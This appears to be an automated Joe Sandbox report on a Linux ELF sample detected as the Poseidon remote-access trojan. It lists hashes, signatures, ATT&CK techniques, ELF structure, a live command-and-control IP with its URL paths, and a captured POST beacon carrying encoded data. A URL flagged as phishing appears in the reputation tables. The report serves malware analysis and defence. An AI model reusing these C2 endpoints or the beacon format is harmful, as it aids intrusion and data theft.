Edit tour

Linux Analysis Report
ulinux-logs.elf

Overview

General Information

Sample name:ulinux-logs.elf
Analysis ID:1645091
MD5:915d49a0a95eb7903709d871bb9a3dbe
SHA1:2032dc00c90c4d8bd0999dbb04d0645055cac29d
SHA256:0adfb26be5ddeefca5a2466946e7fbddd48920f71fadbd8976ee9c2ea22fc704
Tags:elfuser-JAMESWT_MHT
Infos:

Detection

Poseidon
Score:56
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
Yara detected Poseidon
Contains symbols related to standard C library sleeps (sometimes used to evade sandboxing)
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1645091
Start date and time:2025-03-21 13:01:20 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 11m 1s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:ulinux-logs.elf
Detection:MAL
Classification:mal56.troj.linELF@0/0@0/0
Cookbook Comments:
  • Analysis time extended to 480s due to sleep detection in submitted sample
  • Max analysis timeout: 600s exceeded, the analysis took too long
  • VT rate limit hit for: http://161.35.85.95/
  • VT rate limit hit for: http://161.35.85.95/data
  • VT rate limit hit for: http://161.35.85.95/data77bd446-2b3f-4d7c-beb1-343ec11e7427
  • VT rate limit hit for: http://161.35.85.95/dataget_delegate_tasks
  • VT rate limit hit for: http://161.35.85.95/datahttp://161.35.85.95/data
  • VT rate limit hit for: http://161.35.85.95/datahttp://161.35.85.95/dataPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/b
  • VT rate limit hit for: http://161.35.85.95/datamax-age=0
Command:/tmp/ulinux-logs.elf
PID:6223
Exit Code:
Exit Code Info:
Killed:True
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • ulinux-logs.elf (PID: 6223, Parent: 6140, MD5: 915d49a0a95eb7903709d871bb9a3dbe) Arguments: /tmp/ulinux-logs.elf
  • cleanup
SourceRuleDescriptionAuthorStrings
ulinux-logs.elfJoeSecurity_PoseidonYara detected PoseidonJoe Security
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: ulinux-logs.elfVirustotal: Detection: 33%Perma Link
    Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
    Source: unknownTCP traffic detected without corresponding DNS query: 161.35.85.95
    Source: unknownTCP traffic detected without corresponding DNS query: 161.35.85.95
    Source: unknownTCP traffic detected without corresponding DNS query: 161.35.85.95
    Source: unknownTCP traffic detected without corresponding DNS query: 161.35.85.95
    Source: unknownTCP traffic detected without corresponding DNS query: 161.35.85.95
    Source: unknownTCP traffic detected without corresponding DNS query: 161.35.85.95
    Source: unknownTCP traffic detected without corresponding DNS query: 161.35.85.95
    Source: unknownTCP traffic detected without corresponding DNS query: 161.35.85.95
    Source: unknownTCP traffic detected without corresponding DNS query: 161.35.85.95
    Source: unknownTCP traffic detected without corresponding DNS query: 161.35.85.95
    Source: unknownTCP traffic detected without corresponding DNS query: 161.35.85.95
    Source: unknownTCP traffic detected without corresponding DNS query: 161.35.85.95
    Source: unknownTCP traffic detected without corresponding DNS query: 161.35.85.95
    Source: unknownTCP traffic detected without corresponding DNS query: 161.35.85.95
    Source: unknownTCP traffic detected without corresponding DNS query: 161.35.85.95
    Source: unknownTCP traffic detected without corresponding DNS query: 161.35.85.95
    Source: unknownTCP traffic detected without corresponding DNS query: 161.35.85.95
    Source: unknownTCP traffic detected without corresponding DNS query: 161.35.85.95
    Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
    Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
    Source: unknownTCP traffic detected without corresponding DNS query: 161.35.85.95
    Source: unknownTCP traffic detected without corresponding DNS query: 161.35.85.95
    Source: unknownTCP traffic detected without corresponding DNS query: 161.35.85.95
    Source: unknownTCP traffic detected without corresponding DNS query: 161.35.85.95
    Source: unknownTCP traffic detected without corresponding DNS query: 161.35.85.95
    Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
    Source: unknownTCP traffic detected without corresponding DNS query: 161.35.85.95
    Source: unknownTCP traffic detected without corresponding DNS query: 161.35.85.95
    Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
    Source: unknownTCP traffic detected without corresponding DNS query: 161.35.85.95
    Source: unknownTCP traffic detected without corresponding DNS query: 161.35.85.95
    Source: unknownTCP traffic detected without corresponding DNS query: 161.35.85.95
    Source: unknownTCP traffic detected without corresponding DNS query: 161.35.85.95
    Source: unknownTCP traffic detected without corresponding DNS query: 161.35.85.95
    Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
    Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
    Source: unknownHTTP traffic detected: POST /data HTTP/1.1Host: 161.35.85.95User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoContent-Length: 1608Accept-Encoding: gzipConnection: closeData Raw: 4e 44 64 6c 4d 7a 45 7a 4d 54 55 74 4e 44 5a 6b 4e 79 30 30 4d 57 49 34 4c 54 67 78 4f 44 55 74 5a 6a 51 30 59 54 59 34 4d 7a 51 77 59 32 55 30 76 69 51 52 43 75 56 43 41 50 58 38 6d 66 63 78 4a 37 55 4b 67 53 54 64 33 76 46 38 48 78 66 70 52 34 72 73 77 34 38 36 32 31 6d 77 46 73 39 76 70 76 4a 57 4e 73 6a 62 7a 75 4a 71 35 59 46 38 63 2b 36 2b 56 32 79 75 48 4a 49 46 42 48 69 6e 61 6f 39 4d 43 52 38 74 4a 41 39 49 65 6a 36 6c 64 31 73 47 52 35 66 4c 6f 73 41 35 6d 49 6c 5a 4c 75 30 64 42 54 45 43 46 73 44 65 2f 72 33 69 50 55 45 2f 50 6a 44 52 36 34 56 71 6c 77 76 44 47 59 37 73 42 43 67 44 4c 36 6f 6d 5a 45 4c 4d 47 46 58 7a 50 67 4a 73 43 6e 75 6f 7a 39 5a 59 66 37 48 54 6e 35 75 46 6a 76 51 33 77 4f 5a 34 6d 33 54 66 46 76 34 6d 75 50 52 47 31 79 49 61 4b 4a 69 67 44 69 72 2f 2f 63 56 63 71 50 4f 5a 31 62 70 31 77 7a 5a 6b 63 4d 71 37 71 2b 63 47 38 2f 4c 46 66 58 56 75 43 59 69 43 56 51 66 38 65 74 62 6f 63 7a 39 6e 45 42 36 55 79 4e 53 6e 64 57 66 63 38 2b 78 34 39 72 43 77 54 33 48 43 6e 50 73 65 59 70 4e 56 76 54 4e 43 54 2b 43 70 67 69 75 63 6c 32 68 43 77 46 56 47 4a 75 43 36 31 41 44 4b 43 77 69 62 45 63 74 61 70 4b 70 75 46 66 47 68 36 32 68 32 6d 52 66 42 31 6b 47 65 47 4c 48 64 35 39 79 57 47 62 43 4e 6f 6e 6d 55 38 33 65 56 33 59 63 62 62 56 47 58 39 77 72 30 34 65 63 71 37 63 34 6a 45 34 43 4a 4b 4c 74 78 56 7a 35 2f 48 4c 64 48 6d 6e 35 37 34 4c 74 74 53 49 75 52 51 46 73 4b 31 70 36 72 77 69 33 4b 51 59 44 34 6b 41 46 6b 70 34 4d 47 77 71 6e 54 6f 46 34 44 39 6f 49 59 6a 54 52 78 79 50 35 55 42 44 37 72 74 62 53 46 6d 32 37 2b 36 58 53 59 4c 58 57 56 2f 6b 63 38 66 49 76 4e 72 6e 36 54 59 5a 35 4c 66 31 2f 65 6b 48 61 33 69 4b 47 69 56 4d 48 65 48 55 50 4b 73 35 33 54 66 6d 31 58 36 4e 45 71 67 49 6b 50 6a 77 68 5a 56 70 76 6a 55 5a 64 6b 77 45 50 36 71 74 50 45 31 38 32 67 75 6a 76 49 38 52 62 70 72 70 58 59 34 52 43 63 6d 65 71 2b 30 59 38 4a 35 45 47 35 78 2b 4d 69 69 6a 46 63 30 50 63 4b 7a 53 68 72 38 5a 45 4a 46 45 4d 67 42 5a 6e 7a 48 6d 7a 6d 79 59 6c 6b 76 6b 42 43 41 72 30 41 49 43 38 32 62 35 6b 6d 56 5a 74 49 46 77 47 4f 57 49 35 67 61 7a 39 6a 76 4a 41 30 4c 32 61 41 47 37 6d 55 70 45 5a 38 51 4c 72 7a 52 78 67 54 49 49 73 2f 2f 6d 4d 45 69 4c 37 38 37 50 76 76 79 46 55 4f 37 71 2b 41 43 7a 6c 44 68 2f 73 42 64 4d 69 4d 35 36 46 35 6a 2b 67 69 33 59 69 77 76 30 59 6b 72 61 2f 79 79 38 32 53 4a 6a 2b 72 4a 63 31 78 32 41 39 53 67 46 31 6a 41 30 5a 57 37 44 73 2f 4a 62 69 59 4a 62 71 68 56 57 41 32 73 6b 4b 6f 49 4e 32 34 68 39 71 57 48 52 2f 71 34 50 66 48 36 54 6c 6c 35 56 74 4e 4b 67 69 68 63 78 79 79 4a 39 51 71 52 51 6b 44 73 63 38 34 36 54 69 7a 4b 37 5a 4c 61 53 7a 7a 4a 74 70 57 73 64 44 75 49 39 57 77 7a 4a 66 34 42 51 42 31 7a 49 31 71 32 31 6b 42 68 61 4d 41 34 46 30 71 56 37 52 57 66 49 63 79 6b 2f 6a 48 43 58 62 72 73
    Source: ulinux-logs.elfELF static info symbol of initial sample: freeaddrinfo
    Source: ulinux-logs.elfELF static info symbol of initial sample: gai_strerror
    Source: ulinux-logs.elfELF static info symbol of initial sample: getaddrinfo
    Source: ulinux-logs.elfELF static info symbol of initial sample: getnameinfo
    Source: ulinux-logs.elf, 6223.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://161.35.85.95/
    Source: ulinux-logs.elf, 6223.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://161.35.85.95/data
    Source: ulinux-logs.elf, 6223.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://161.35.85.95/data77bd446-2b3f-4d7c-beb1-343ec11e7427
    Source: ulinux-logs.elf, 6223.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://161.35.85.95/dataget_delegate_tasks
    Source: ulinux-logs.elf, 6223.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://161.35.85.95/datahttp://161.35.85.95/data
    Source: ulinux-logs.elf, 6223.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://161.35.85.95/datahttp://161.35.85.95/dataPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/b
    Source: ulinux-logs.elf, 6223.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://161.35.85.95/datamax-age=0
    Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
    Source: ELF static info symbol of initial sample.symtab present: no
    Source: classification engineClassification label: mal56.troj.linELF@0/0@0/0
    Source: ELF file sectionSubmission: ulinux-logs.elf
    Source: ELF symbol in initial sampleSymbol name: nanosleep
    Source: /tmp/ulinux-logs.elf (PID: 6223)Queries kernel information via 'uname': Jump to behavior

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: ulinux-logs.elf, type: SAMPLE

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: ulinux-logs.elf, type: SAMPLE
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath InterceptionPath Interception1
    Virtualization/Sandbox Evasion
    OS Credential Dumping1
    Security Software Discovery
    Remote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS Memory1
    Virtualization/Sandbox Evasion
    Remote Desktop ProtocolData from Removable Media1
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    No configs have been found
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Number of created Files
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1645091 Sample: ulinux-logs.elf Startdate: 21/03/2025 Architecture: LINUX Score: 56 8 109.202.202.202, 80 INIT7CH Switzerland 2->8 10 161.35.85.95, 52630, 52632, 52634 DIGITALOCEAN-ASNUS United States 2->10 12 2 other IPs or domains 2->12 14 Multi AV Scanner detection for submitted file 2->14 16 Yara detected Poseidon 2->16 6 ulinux-logs.elf 2->6         started        signatures3 process4

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    ulinux-logs.elf34%VirustotalBrowse
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches

    Download Network PCAP: filteredfull

    No contacted domains info
    NameMaliciousAntivirus DetectionReputation
    http://161.35.85.95/datafalse
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      http://161.35.85.95/datahttp://161.35.85.95/dataulinux-logs.elf, 6223.1.000000c000000000.000000c000800000.rw-.sdmpfalse
        unknown
        http://161.35.85.95/datahttp://161.35.85.95/dataPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bulinux-logs.elf, 6223.1.000000c000000000.000000c000800000.rw-.sdmpfalse
          unknown
          http://161.35.85.95/dataget_delegate_tasksulinux-logs.elf, 6223.1.000000c000000000.000000c000800000.rw-.sdmpfalse
            unknown
            http://161.35.85.95/ulinux-logs.elf, 6223.1.000000c000000000.000000c000800000.rw-.sdmpfalse
              unknown
              http://161.35.85.95/datamax-age=0ulinux-logs.elf, 6223.1.000000c000000000.000000c000800000.rw-.sdmpfalse
                unknown
                http://161.35.85.95/data77bd446-2b3f-4d7c-beb1-343ec11e7427ulinux-logs.elf, 6223.1.000000c000000000.000000c000800000.rw-.sdmpfalse
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  109.202.202.202
                  unknownSwitzerland
                  13030INIT7CHfalse
                  91.189.91.43
                  unknownUnited Kingdom
                  41231CANONICAL-ASGBfalse
                  91.189.91.42
                  unknownUnited Kingdom
                  41231CANONICAL-ASGBfalse
                  161.35.85.95
                  unknownUnited States
                  14061DIGITALOCEAN-ASNUSfalse
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                  • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                  91.189.91.43na.elfGet hashmaliciousPrometeiBrowse
                    debug.dbg.elfGet hashmaliciousUnknownBrowse
                      miner.elfGet hashmaliciousUnknownBrowse
                        na.elfGet hashmaliciousPrometeiBrowse
                          na.elfGet hashmaliciousPrometeiBrowse
                            na.elfGet hashmaliciousPrometeiBrowse
                              linux_amd64.elfGet hashmaliciousChaosBrowse
                                na.elfGet hashmaliciousPrometeiBrowse
                                  na.elfGet hashmaliciousPrometeiBrowse
                                    sparc.nn.elfGet hashmaliciousMiraiBrowse
                                      91.189.91.42na.elfGet hashmaliciousPrometeiBrowse
                                        debug.dbg.elfGet hashmaliciousUnknownBrowse
                                          miner.elfGet hashmaliciousUnknownBrowse
                                            na.elfGet hashmaliciousPrometeiBrowse
                                              na.elfGet hashmaliciousPrometeiBrowse
                                                na.elfGet hashmaliciousPrometeiBrowse
                                                  linux_amd64.elfGet hashmaliciousChaosBrowse
                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                        sparc.nn.elfGet hashmaliciousMiraiBrowse
                                                          No context
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          CANONICAL-ASGBna.elfGet hashmaliciousPrometeiBrowse
                                                          • 91.189.91.42
                                                          debug.dbg.elfGet hashmaliciousUnknownBrowse
                                                          • 91.189.91.42
                                                          miner.elfGet hashmaliciousUnknownBrowse
                                                          • 91.189.91.42
                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                          • 91.189.91.42
                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                          • 91.189.91.42
                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                          • 91.189.91.42
                                                          linux_amd64.elfGet hashmaliciousChaosBrowse
                                                          • 91.189.91.42
                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                          • 91.189.91.42
                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                          • 91.189.91.42
                                                          sparc.nn.elfGet hashmaliciousMiraiBrowse
                                                          • 91.189.91.42
                                                          CANONICAL-ASGBna.elfGet hashmaliciousPrometeiBrowse
                                                          • 91.189.91.42
                                                          debug.dbg.elfGet hashmaliciousUnknownBrowse
                                                          • 91.189.91.42
                                                          miner.elfGet hashmaliciousUnknownBrowse
                                                          • 91.189.91.42
                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                          • 91.189.91.42
                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                          • 91.189.91.42
                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                          • 91.189.91.42
                                                          linux_amd64.elfGet hashmaliciousChaosBrowse
                                                          • 91.189.91.42
                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                          • 91.189.91.42
                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                          • 91.189.91.42
                                                          sparc.nn.elfGet hashmaliciousMiraiBrowse
                                                          • 91.189.91.42
                                                          INIT7CHna.elfGet hashmaliciousPrometeiBrowse
                                                          • 109.202.202.202
                                                          debug.dbg.elfGet hashmaliciousUnknownBrowse
                                                          • 109.202.202.202
                                                          miner.elfGet hashmaliciousUnknownBrowse
                                                          • 109.202.202.202
                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                          • 109.202.202.202
                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                          • 109.202.202.202
                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                          • 109.202.202.202
                                                          linux_amd64.elfGet hashmaliciousChaosBrowse
                                                          • 109.202.202.202
                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                          • 109.202.202.202
                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                          • 109.202.202.202
                                                          sparc.nn.elfGet hashmaliciousMiraiBrowse
                                                          • 109.202.202.202
                                                          DIGITALOCEAN-ASNUShttp://t.dripemail2.com/c/eyJhbGciOiJIUzI1NiJ9.eyJhdWQiOiJkZXRvdXIiLCJpc3MiOiJtb25vbGl0aCIsInN1YiI6ImRldG91cl9saW5rIiwiaWF0IjoxNzQyNDg1MjAxLCJuYmYiOjE3NDI0ODUyMDEsImFjY291bnRfaWQiOiI5MjExNzMxIiwiZGVsaXZlcnlfaWQiOiI2ZGY2cmIydXVwbjY4cnNhdWo0NCIsInRva2VuIjoiNmRmNnJiMnV1cG42OHJzYXVqNDQiLCJzZW5kX2F0IjoxNzQyNDgzOTQ4LCJlbWFpbF9pZCI6MTA1MDc4ODcsImVtYWlsYWJsZV90eXBlIjoiQnJvYWRjYXN0IiwiZW1haWxhYmxlX2lkIjo0MTkzMDc4LCJ1cmwiOiJodHRwOi8vZ2NyLnVwcGxleC5jby5rZT9fX3M9cWMwZ2JsdTk1emZnYmh3ZHp5OG4mdXRtX3NvdXJjZT1kcmlwJnV0bV9tZWRpdW09ZW1haWwmdXRtX2NhbXBhaWduPVdlK2dvdCthK21ha2VvdmVyLiJ9.nJ9tzd3-jhbWgSNwRLHamHKYwZXuNcZIG2E1QBFM5fgGet hashmaliciousHTMLPhisherBrowse
                                                          • 162.243.170.173
                                                          resgod.arm.elfGet hashmaliciousMiraiBrowse
                                                          • 46.101.242.253
                                                          resgod.mips.elfGet hashmaliciousMiraiBrowse
                                                          • 134.209.166.100
                                                          message_v2.zipGet hashmaliciousUnknownBrowse
                                                          • 157.245.72.142
                                                          i686.elfGet hashmaliciousMiraiBrowse
                                                          • 157.230.180.187
                                                          i486.elfGet hashmaliciousMiraiBrowse
                                                          • 165.227.55.112
                                                          sh4.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                          • 68.183.122.246
                                                          mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                          • 68.183.122.246
                                                          x86.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                          • 68.183.122.246
                                                          mipsel.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                          • 68.183.122.246
                                                          No context
                                                          No context
                                                          No created / dropped files found
                                                          File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=ac7dad0c08e69c2e45ed9dfb9d9b54f1cb19e9fc, for GNU/Linux 3.2.0, stripped
                                                          Entropy (8bit):6.20283147917405
                                                          TrID:
                                                          • ELF Executable and Linkable format (Linux) (4029/14) 49.77%
                                                          • ELF Executable and Linkable format (generic) (4004/1) 49.46%
                                                          • Lumena CEL bitmap (63/63) 0.78%
                                                          File name:ulinux-logs.elf
                                                          File size:8'158'184 bytes
                                                          MD5:915d49a0a95eb7903709d871bb9a3dbe
                                                          SHA1:2032dc00c90c4d8bd0999dbb04d0645055cac29d
                                                          SHA256:0adfb26be5ddeefca5a2466946e7fbddd48920f71fadbd8976ee9c2ea22fc704
                                                          SHA512:2c479b210004df72bb74ae0319bd9e96144c1ae2d3968eb49c1b1da9456e78cc607185020f7dc42d502c9103acae1e5f1c342d173aa9efcc8343eb0628412053
                                                          SSDEEP:49152:SUZYhGZ9/HqXv9stcmRJxSZeRSGZRFSET0qBiPpFNyMFRD/5EEHlchbKflKtMMF7:SnKE9Xm7RSARBLMFRDREMctLme
                                                          TLSH:F7864943ECA545E8C1ADD2348A669263BA717C494F3063D32B50F7782F77BD0AAB9344
                                                          File Content Preview:.ELF..............>......#@.....@.......hs|.........@.8...@.".!.........@.......@.@.....@.@...............................................@.......@...............................................@.......@...................................... ....... @....

                                                          ELF header

                                                          Class:ELF64
                                                          Data:2's complement, little endian
                                                          Version:1 (current)
                                                          Machine:Advanced Micro Devices X86-64
                                                          Version Number:0x1
                                                          Type:EXEC (Executable file)
                                                          OS/ABI:UNIX - System V
                                                          ABI Version:0
                                                          Entry Point Address:0x4023f0
                                                          Flags:0x0
                                                          ELF Header Size:64
                                                          Program Header Offset:64
                                                          Program Header Size:56
                                                          Number of Program Headers:12
                                                          Section Header Offset:8156008
                                                          Section Header Size:64
                                                          Number of Section Headers:34
                                                          Header String Table Index:33
                                                          NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                          NULL0x00x00x00x00x0000
                                                          .interpPROGBITS0x4002e00x2e00x1c0x00x2A001
                                                          .note.gnu.build-idNOTE0x4002fc0x2fc0x240x00x2A004
                                                          .note.ABI-tagNOTE0x4003200x3200x200x00x2A004
                                                          .gnu.hashGNU_HASH0x4003400x3400x340x00x2A508
                                                          .dynsymDYNSYM0x4003780x3780x6300x180x2A618
                                                          .dynstrSTRTAB0x4009a80x9a80x3300x00x2A001
                                                          .gnu.versionVERSYM0x400cd80xcd80x840x20x2A502
                                                          .gnu.version_rVERNEED0x400d600xd600x700x00x2A638
                                                          .rela.dynRELA0x400dd00xdd00x480x180x2A508
                                                          .rela.pltRELA0x400e180xe180x5700x180x42AI5268
                                                          .initPROGBITS0x4020000x20000x170x00x6AX004
                                                          .pltPROGBITS0x4020200x20200x3b00x100x6AX0016
                                                          .textPROGBITS0x4023e00x23e00x3b98c10x00x6AX0032
                                                          .finiPROGBITS0x7bbca40x3bbca40x90x00x6AX004
                                                          .rodataPROGBITS0x7bc0000x3bc0000x1896b00x00x2A0032
                                                          .typelinkPROGBITS0x9456c00x5456c00x28480x00x2A0032
                                                          .itablinkPROGBITS0x947f200x547f200xee00x00x2A0032
                                                          .gopclntabPROGBITS0x948e000x548e000x2383000x00x2A0032
                                                          .eh_frame_hdrPROGBITS0xb811000x7811000x1c40x00x2A004
                                                          .eh_framePROGBITS0xb812c80x7812c80x8d80x00x2A008
                                                          .tbssNOBITS0xb82de80x781de80x80x00x403WAT008
                                                          .init_arrayINIT_ARRAY0xb82de80x781de80x80x80x3WA008
                                                          .fini_arrayFINI_ARRAY0xb82df00x781df00x80x80x3WA008
                                                          .dynamicDYNAMIC0xb82df80x781df80x1f00x100x3WA608
                                                          .gotPROGBITS0xb82fe80x781fe80x180x80x3WA008
                                                          .got.pltPROGBITS0xb830000x7820000x1e80x80x3WA008
                                                          .dataPROGBITS0xb832000x7822000x121f00x00x3WA0032
                                                          .go.buildinfoPROGBITS0xb953f00x7943f00xbf00x00x3WA0016
                                                          .noptrdataPROGBITS0xb95fe00x794fe00x322220x00x3WA0032
                                                          .bssNOBITS0xbc82200x7c72020x22b400x00x3WA0032
                                                          .noptrbssNOBITS0xbead600x7c72020xe1b00x00x3WA0032
                                                          .commentPROGBITS0x00x7c72020x270x10x30MS001
                                                          .shstrtabSTRTAB0x00x7c72290x13b0x00x0001
                                                          TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                          PHDR0x400x4000400x4000400x2a00x2a02.03640x4R 0x8
                                                          INTERP0x2e00x4002e00x4002e00x1c0x1c3.94080x4R 0x1/lib64/ld-linux-x86-64.so.2.interp
                                                          LOAD0x00x4000000x4000000x13880x13882.89130x4R 0x1000.interp .note.gnu.build-id .note.ABI-tag .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt
                                                          LOAD0x20000x4020000x4020000x3b9cad0x3b9cad6.16820x5R E0x1000.init .plt .text .fini
                                                          LOAD0x3bc0000x7bc0000x7bc0000x3c5ba00x3c5ba05.66870x4R 0x1000.rodata .typelink .itablink .gopclntab .eh_frame_hdr .eh_frame
                                                          LOAD0x781de80xb82de80xb82de80x4541a0x761285.08230x6RW 0x1000.tbss .init_array .fini_array .dynamic .got .got.plt .data .go.buildinfo .noptrdata .bss .noptrbss
                                                          DYNAMIC0x781df80xb82df80xb82df80x1f00x1f01.57870x6RW 0x8.dynamic
                                                          NOTE0x2fc0x4002fc0x4002fc0x440x443.36730x4R 0x4.note.gnu.build-id .note.ABI-tag
                                                          TLS0x781de80xb82de80xb82de80x00x80.00000x4R 0x8.tbss
                                                          GNU_EH_FRAME0x7811000xb811000xb811000x1c40x1c44.58390x4R 0x4.eh_frame_hdr
                                                          GNU_STACK0x00x00x00x00x00.00000x6RW 0x10
                                                          GNU_RELRO0x781de80xb82de80xb82de80x2180x2181.57040x4R 0x1.tbss .init_array .fini_array .dynamic .got
                                                          TypeMetaValueTag
                                                          DT_NEEDEDsharedliblibpthread.so.00x1
                                                          DT_NEEDEDsharedliblibresolv.so.20x1
                                                          DT_NEEDEDsharedliblibc.so.60x1
                                                          DT_INITvalue0x4020000xc
                                                          DT_FINIvalue0x7bbca40xd
                                                          DT_INIT_ARRAYvalue0xb82de80x19
                                                          DT_INIT_ARRAYSZbytes80x1b
                                                          DT_FINI_ARRAYvalue0xb82df00x1a
                                                          DT_FINI_ARRAYSZbytes80x1c
                                                          DT_GNU_HASHvalue0x4003400x6ffffef5
                                                          DT_STRTABvalue0x4009a80x5
                                                          DT_SYMTABvalue0x4003780x6
                                                          DT_STRSZbytes8160xa
                                                          DT_SYMENTbytes240xb
                                                          DT_DEBUGvalue0x00x15
                                                          DT_PLTGOTvalue0xb830000x3
                                                          DT_PLTRELSZbytes13920x2
                                                          DT_PLTRELpltrelDT_RELA0x14
                                                          DT_JMPRELvalue0x400e180x17
                                                          DT_RELAvalue0x400dd00x7
                                                          DT_RELASZbytes720x8
                                                          DT_RELAENTbytes240x9
                                                          DT_VERNEEDvalue0x400d600x6ffffffe
                                                          DT_VERNEEDNUMvalue30x6fffffff
                                                          DT_VERSYMvalue0x400cd80x6ffffff0
                                                          DT_NULLvalue0x00x0
                                                          NameVersion Info NameVersion Info File NameSection NameValueSizeSymbol TypeSymbol BindSymbol VisibilityNdx
                                                          .dynsym0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                          RunMain.dynsym0x7bac2060FUNC<unknown>DEFAULT13
                                                          __errno_locationGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          __gmon_start__.dynsym0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                          __libc_start_mainGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          __res_searchGLIBC_2.2.5libresolv.so.2.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          _cgo_panic.dynsym0x48c3e045FUNC<unknown>DEFAULT13
                                                          _cgo_topofstack.dynsym0x47612025FUNC<unknown>DEFAULT13
                                                          abortGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          crosscall2.dynsym0x48c460104FUNC<unknown>DEFAULT13
                                                          fprintfGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
